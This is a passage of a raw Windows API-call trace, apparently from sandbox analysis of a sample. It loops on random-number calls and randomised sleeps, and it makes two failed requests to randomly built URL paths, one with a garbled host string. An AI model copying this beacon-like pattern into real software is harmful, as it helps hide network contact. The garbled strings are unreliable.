(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.084] GetProcessHeap () returned 0x440000 [0170.084] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0170.084] lstrcpyA (in: lpString1=0x472b10, lpString2="E>`$s://www.yahoo.com" | out: lpString1="E>`$s://www.yahoo.com") returned="E>`$s://www.yahoo.com" [0170.084] lstrcatA (in: lpString1="E>`$s://www.yahoo.com", lpString2="/ap9btqPqu6ggx88kwq54A5aoz6Zeno3eq1r7mi7wEsyw5/" | out: lpString1="E>`$s://www.yahoo.com/ap9btqPqu6ggx88kwq54A5aoz6Zeno3eq1r7mi7wEsyw5/") returned="E>`$s://www.yahoo.com/ap9btqPqu6ggx88kwq54A5aoz6Zeno3eq1r7mi7wEsyw5/" [0170.084] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0170.084] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="E>`$s://www.yahoo.com/ap9btqPqu6ggx88kwq54A5aoz6Zeno3eq1r7mi7wEsyw5/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0170.084] GetProcessHeap () returned 0x440000 [0170.084] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0170.085] GetProcessHeap () returned 0x440000 [0170.085] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5330 | out: hHeap=0x440000) returned 1 [0170.085] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0170.085] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0170.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0170.086] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0170.086] Sleep (dwMilliseconds=0x16e83) [0170.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0170.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.241] GetProcessHeap () returned 0x440000 [0170.241] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0170.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0170.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b264, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a1b264) returned 0x0 [0170.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0170.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.412] GetProcessHeap () returned 0x440000 [0170.412] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0170.412] lstrcpyA (in: lpString1=0x473b90, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0170.412] lstrcatA (in: lpString1="P²¡\x03", lpString2="/spoc6jaJukTF5sHfsk/ovMgZd0HfN0Un9dIScvTw2Xkjyr9Rg9d851a/" | out: lpString1="P²¡\x03/spoc6jaJukTF5sHfsk/ovMgZd0HfN0Un9dIScvTw2Xkjyr9Rg9d851a/") returned="P²¡\x03/spoc6jaJukTF5sHfsk/ovMgZd0HfN0Un9dIScvTw2Xkjyr9Rg9d851a/" [0170.412] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0170.412] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/spoc6jaJukTF5sHfsk/ovMgZd0HfN0Un9dIScvTw2Xkjyr9Rg9d851a/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0170.412] GetProcessHeap () returned 0x440000 [0170.412] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0170.412] GetProcessHeap () returned 0x440000 [0170.412] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0170.413] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0170.413] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0170.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0170.413] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0170.413] Sleep (dwMilliseconds=0xf3c2) [0170.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0170.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.597] GetProcessHeap () returned 0x440000 [0170.597] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17200 [0170.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17201, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a17201) returned 0x0 [0170.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 